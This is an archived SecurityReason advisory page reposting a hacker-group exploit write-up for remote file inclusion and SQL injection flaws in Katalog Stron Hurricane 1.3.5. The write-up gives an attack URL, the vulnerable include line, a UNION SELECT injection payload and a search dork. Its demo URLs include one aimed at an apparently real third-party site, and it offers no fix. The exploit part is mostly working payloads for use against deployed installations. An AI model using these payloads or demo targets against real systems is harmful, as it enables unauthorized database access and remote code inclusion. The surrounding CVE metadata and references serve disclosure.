|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 7040 CVE : CVE-2010-0677 CVE : CVE-2010-0678 CWE : CWE-89 CWE : CWE-94 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : kaMtiEz Published : 26.02.2010
Advisory Content : ########################################## ## Katalog Stron Hurricane Multiple Vulnerability RFI / SQL ## ## Author : kaMtiEz (kamzcrew@yahoo.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : 14 February, 2010 ## ################################################ [ Software Information ] [+] Vendor : http://www.katalog.hurricane.pl/ [+] Download : http://www.katalog.hurricane.pl/download.html [+] version : 1.3.5 or lower maybe also affected [+] Vulnerability : RFI [+] Dork : "CiHuY" [+] LOCATION : INDONESIA - JOGJA ################################################ [ Here We go .. Live From Jogja City.. ] [ RFI ] http://127.0.0.1/[kaMtiEz]/includes/moderation.php?includes_directory=[INDO NESIANCODER] [ BUG ] [!] moderation.php include($includes_directory.'population.php'); [ SQL ] http://127.0.0.1/[kaMtiEz]/index.php?inc=category&get=[INDONESIANCODER] [ XPL ] 6666+union+all+select+1,database(),3-- [ DEMO ] http://server/includes/moderation.php?includes_directory=[EVILc0de] http://www.bazastron.com.pl/index.php?inc=category&get=6666+union+all+selec t+1,database(),3-- [ FIX ] dunno :"> ########################################################################### ################################## [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzh ack [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,Ibl13Z,Milo [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk [ NOTE ] [+] Ibl13Z : Turut berduka atas Flashdisknya gan [+] Milo : Telpon MyQueen Terosss hhaa [+] r3m1ck : KAYAK KUWEK Ojo Homok Yak .. ndak baik [+] gonzhack : gua doain bro moga balikan .. hha .. [+] for some one .. one day .. u will be mind .. >.< [ QUOTE ] [+] we are NOT DEAD INDONESIANCODER STILL r0x [+] nothing secure .. References : http://www.exploit-db.com/exploits/11452
http://secunia.com/advisories/38581
http://packetstormsecurity.org/1002-exploits/katalog-rfisql.txt
http://osvdb.org/62340  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |